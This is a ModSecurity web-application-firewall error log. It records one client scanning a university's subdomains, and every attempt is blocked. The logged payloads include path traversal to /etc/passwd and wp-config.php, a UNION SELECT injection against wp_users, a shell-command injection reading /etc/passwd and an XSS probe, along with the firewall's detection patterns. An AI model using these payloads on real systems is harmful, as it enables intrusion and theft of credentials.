[Tue Aug 29 11:42:34.459816 2023] [:error] [pid 1855] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:file: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/avatar_uploader.pages.inc"] [unique_id "ZO13OsCo-f0AAAc-52IAAAAN"]
[Tue Aug 29 11:42:34.468874 2023] [:error] [pid 1854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within XML: file_datafile_name`{}`.pptx| |cat/etc/passwd||a #service_ppt2lp_size720x540"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/main/webservices/additional_webservices.php"] [unique_id "ZO13OsCo-f0AAAc@cYsAAAAL"]
[Tue Aug 29 11:42:35.372845 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:file: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/avatar_uploader.pages.inc"] [unique_id "ZO13O8Co-f0AAAdftSkAAAAG"]
[Tue Aug 29 11:42:40.359042 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php"] [unique_id "ZO13QMCo-f0AAAQSW10AAAA0"]
[Tue Aug 29 11:42:40.365285 2023] [:error] [pid 1913] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:query: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/filter/jmol/js/jsmol/php/jsmol.php"] [unique_id "ZO13QMCo-f0AAAd5nscAAAAm"]
[Tue Aug 29 11:42:40.389452 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php"] [unique_id "ZO13QMCo-f0AAAdxURwAAAAC"]
[Tue Aug 29 11:42:40.393369 2023] [:error] [pid 1917] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:query: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/filter/jmol/js/jsmol/php/jsmol.php"] [unique_id "ZO13QMCo-f0AAAd9UMQAAAAr"]
[Tue Aug 29 11:42:40.403021 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:query: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/filter/jmol/js/jsmol/php/jsmol.php"] [unique_id "ZO13QMCo-f0AAAQSW14AAAA0"]
[Tue Aug 29 11:42:40.438560 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php"] [unique_id "ZO13QMCo-f0AAAQSW18AAAA0"]
[Tue Aug 29 11:42:40.462875 2023] [:error] [pid 1913] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:query: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/filter/jmol/js/jsmol/php/jsmol.php"] [unique_id "ZO13QMCo-f0AAAd5nsgAAAAm"]
[Tue Aug 29 11:42:40.518249 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php"] [unique_id "ZO13QMCo-f0AAAdOeSEAAAAS"]
[Tue Aug 29 11:42:40.518461 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php"] [unique_id "ZO13QMCo-f0AAAdQ3hcAAAAV"]
[Tue Aug 29 11:42:40.529630 2023] [:error] [pid 1945] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:query: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/filter/jmol/js/jsmol/php/jsmol.php"] [unique_id "ZO13QMCo-f0AAAeZ54IAAAAN"]
[Tue Aug 29 11:42:41.458288 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:c: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO13QcCo-f0AAAdOeSQAAAAS"]
[Tue Aug 29 11:42:41.459582 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:c: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO13QcCo-f0AAAeX1AsAAAAK"]
[Tue Aug 29 11:42:41.472566 2023] [:error] [pid 1923] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:c: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO13QcCo-f0AAAeDiqUAAAAx"]
[Tue Aug 29 11:42:41.474914 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php"] [unique_id "ZO13QcCo-f0AAAeChXgAAAAw"]
[Tue Aug 29 11:42:41.477954 2023] [:error] [pid 1924] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:query: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/filter/jmol/js/jsmol/php/jsmol.php"] [unique_id "ZO13QcCo-f0AAAeEDv8AAAAy"]
[Tue Aug 29 11:42:41.480976 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:c: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO13QcCo-f0AAAQSW2MAAAA0"]
[Tue Aug 29 11:42:41.492987 2023] [:error] [pid 1923] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:c: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO13QcCo-f0AAAeDiqYAAAAx"]
[Tue Aug 29 11:42:42.361525 2023] [:error] [pid 1923] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:tpl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:tpl: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/badging/badge_print_v0.php"] [unique_id "ZO13QsCo-f0AAAeDiqcAAAAx"]
[Tue Aug 29 11:42:42.371931 2023] [:error] [pid 1879] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:tpl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:tpl: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/badging/badge_print_v0.php"] [unique_id "ZO13QsCo-f0AAAdXIngAAAAd"]
[Tue Aug 29 11:42:42.377725 2023] [:error] [pid 1914] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:tpl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:tpl: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/badging/badge_print_v0.php"] [unique_id "ZO13QsCo-f0AAAd64RIAAAAp"]
[Tue Aug 29 11:42:42.401759 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:tpl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:tpl: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/badging/badge_print_v0.php"] [unique_id "ZO13QsCo-f0AAAdftTAAAAAG"]
[Tue Aug 29 11:42:42.421342 2023] [:error] [pid 1912] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:tpl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:tpl: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/badging/badge_print_v0.php"] [unique_id "ZO13QsCo-f0AAAd4axcAAAAj"]
[Tue Aug 29 11:42:43.369176 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:calculate_attribute_counts[0][query_type]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:calculate_attribute_counts[0][query_type]: calculate_attribute_counts[0][query_type]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO13Q8Co-f0AAAcoNj4AAAAF"]
[Tue Aug 29 11:42:43.369247 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:calculate_attribute_counts[0][query_type]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:calculate_attribute_counts[0][query_type]: calculate_attribute_counts[0][query_type]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO13Q8Co-f0AAAdOeSkAAAAS"]
[Tue Aug 29 11:42:43.374078 2023] [:error] [pid 1919] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:c: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO13Q8Co-f0AAAd-FzsAAAAt"]
[Tue Aug 29 11:42:43.416941 2023] [:error] [pid 1923] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(union(.*?)select(.*?)from)))" at ARGS:calculate_attribute_counts[0][taxonomy]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "225"] [id "981276"] [msg "Looking for basic sql injection. Common attack string for mysql, oracle and others."] [data "Matched Data: union%20all%20select%201%2Cconcat%28id%2C0x3a%2c%22sqli-test%22%29from found within ARGS:calculate_attribute_counts[0][taxonomy]: %22%29%20union%20all%20select%201%2Cconcat%28id%2C0x3a%2c%22sqli-test%22%29from%20wp_users%20where%20%49%44%20%49%4E%20%281%29%3B%00"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO13Q8Co-f0AAAeDiqoAAAAx"]
[Tue Aug 29 11:42:43.417387 2023] [:error] [pid 1893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(union(.*?)select(.*?)from)))" at ARGS:calculate_attribute_counts[0][taxonomy]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "225"] [id "981276"] [msg "Looking for basic sql injection. Common attack string for mysql, oracle and others."] [data "Matched Data: union%20all%20select%201%2Cconcat%28id%2C0x3a%2c%22sqli-test%22%29from found within ARGS:calculate_attribute_counts[0][taxonomy]: %22%29%20union%20all%20select%201%2Cconcat%28id%2C0x3a%2c%22sqli-test%22%29from%20wp_users%20where%20%49%44%20%49%4E%20%281%29%3B%00"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO13Q8Co-f0AAAdlvcEAAAAl"]
[Tue Aug 29 11:42:43.432870 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(union(.*?)select(.*?)from)))" at ARGS:calculate_attribute_counts[0][taxonomy]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "225"] [id "981276"] [msg "Looking for basic sql injection. Common attack string for mysql, oracle and others."] [data "Matched Data: union%20all%20select%201%2Cconcat%28id%2C0x3a%2c%22sqli-test%22%29from found within ARGS:calculate_attribute_counts[0][taxonomy]: %22%29%20union%20all%20select%201%2Cconcat%28id%2C0x3a%2c%22sqli-test%22%29from%20wp_users%20where%20%49%44%20%49%4E%20%281%29%3B%00"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO13Q8Co-f0AAAcvBmsAAAAJ"]
[Tue Aug 29 11:42:44.747172 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:tpl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:tpl: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/badging/badge_print_v0.php"] [unique_id "ZO13RMCo-f0AAAQSW2kAAAA0"]
[Tue Aug 29 11:42:44.822277 2023] [:error] [pid 1910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(union(.*?)select(.*?)from)))" at ARGS:calculate_attribute_counts[0][taxonomy]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "225"] [id "981276"] [msg "Looking for basic sql injection. Common attack string for mysql, oracle and others."] [data "Matched Data: union%20all%20select%201%2Cconcat%28id%2C0x3a%2c%22sqli-test%22%29from found within ARGS:calculate_attribute_counts[0][taxonomy]: %22%29%20union%20all%20select%201%2Cconcat%28id%2C0x3a%2c%22sqli-test%22%29from%20wp_users%20where%20%49%44%20%49%4E%20%281%29%3B%00"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO13RMCo-f0AAAd231oAAAAI"]
[Tue Aug 29 11:42:46.361195 2023] [:error] [pid 1944] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:path: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/scripts/logdownload.php"] [unique_id "ZO13RsCo-f0AAAeYbx0AAAAB"]
[Tue Aug 29 11:42:46.370595 2023] [:error] [pid 1910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:path: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/scripts/logdownload.php"] [unique_id "ZO13RsCo-f0AAAd2318AAAAI"]
[Tue Aug 29 11:42:46.380299 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:path: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/scripts/logdownload.php"] [unique_id "ZO13RsCo-f0AAAcoNkUAAAAF"]
[Tue Aug 29 11:42:46.439302 2023] [:error] [pid 1877] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:path: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/scripts/logdownload.php"] [unique_id "ZO13RsCo-f0AAAdV7dYAAAAa"]
[Tue Aug 29 11:42:46.494771 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:fileName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/servlets/FetchFile"] [unique_id "ZO13RsCo-f0AAAcvBnMAAAAJ"]
